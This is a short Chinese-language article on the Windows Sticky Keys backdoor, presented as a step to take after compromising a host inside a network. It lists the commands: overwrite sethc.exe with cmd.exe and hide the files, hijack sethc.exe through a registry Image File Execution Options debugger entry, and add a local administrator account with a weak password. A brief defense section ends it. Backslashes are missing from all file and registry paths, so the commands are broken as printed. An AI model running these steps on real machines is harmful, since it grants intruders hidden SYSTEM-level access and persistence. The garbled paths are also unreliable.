0x00 前言

通常，在內網滲透打下一臺機子之后，可以給這臺機子留個Shift后門。

0x01 Shift后門利用

簡介

粘滯鍵漏洞，在Windows系統下連續按5下SHIFT鍵，可以啟動系統的粘滯鍵功能，其進程名為Sethc.exe，應用程序在Windowssystem32下。

黑客用其它應用程序（如：cmd.exe、explorer.exe 或木馬、病毒）將Sethc.exe替換。當再次連續按5次SHIFT鍵，就會啟動黑客替換的應用程序，如此便留下了5下SHIFT后門，黑客3389登錄遠程計算機時，在用戶登錄界面，連續按5下SHIFT就可以啟動該漏洞，進而控制遠程計算機。

漏洞原理

在Windows系統登錄界面狀態下，粘滯鍵仍可以以連續按5下SHIFT鍵運行，并且此時應用程序會以WINDOWS的最高權限－SYSTEM權限運行，所以計算機一旦被安裝該后門，入侵者便可悄無聲息地遠程操縱計算機。

漏洞利用

大致思路如下：

拿到目標主機權限后，到Windowssystem32目錄下，將sethc.exe替換成cmd.exe；

其中，命令行方式為：

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意：要將dllcache文件夾中的緩存刪掉，否則會自動復原回去。

注冊表方式為：

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說明：reg add是向注冊表添加記錄，后面跟的是注冊表的位置，注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個目錄是用來設置鏡像劫持的，要被劫持的就是命令中的sethc粘滯鍵程序，隨后通過/ v來指定鍵名，其中鍵名debugger是固定的，然后通過/ t來指定REG_SZ字符串類型，最后通過/ d來指定鍵的值，即被惡意替換的程序cmd.exe。

這樣，在下次遠程連接目標主機登錄的時候就可以連續5下SHIFT觸發cmd.exe；

可以輸入explorer.exe調出程序管理系統方便操作；

當然，上面的方法存在缺陷，就是可能會導致遠程連接無法持久進行，因此可以直接添加新用戶便于下次直接登錄：

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統盤為NTFS文件系統，可以將sytem32下的sethc.exe文件設為everyone拒絕訪問；

直接將其刪除，最好的方法是在控制面板-輔助功能選項-粘滯鍵選項，將“使用快捷鍵”取消即可。；

通過注冊表設置實現防御；

審核編輯 ：李倩